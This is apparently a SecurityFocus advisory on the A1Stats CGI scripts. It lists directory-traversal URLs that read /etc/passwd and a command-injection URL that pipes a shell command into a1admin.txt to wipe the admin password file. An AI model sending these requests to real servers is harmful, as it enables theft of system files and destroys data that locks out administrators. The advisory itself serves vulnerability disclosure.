Drummon Miles A1Stats Directory Traversal Vulnerability

(courtesy <neme-dhc@hushmail.com>):

To test these vulnerabilities, try the following.
www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd

www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd

These two will give you /etc/passwd.

www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd

This will also give you /etc/passwd but it will
show it in a very mangled manner as the CGI adds
HTML tags to what it thinks is a file it created
itself.

One can also open a file and wreck its contents.

http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt|

will empty a1admin.txt. a1admin.txt contains the
password to change settings of the CGI. When this
file is removed, no one can log in anymore.


 

Privacy Statement
Copyright 2010, SecurityFocus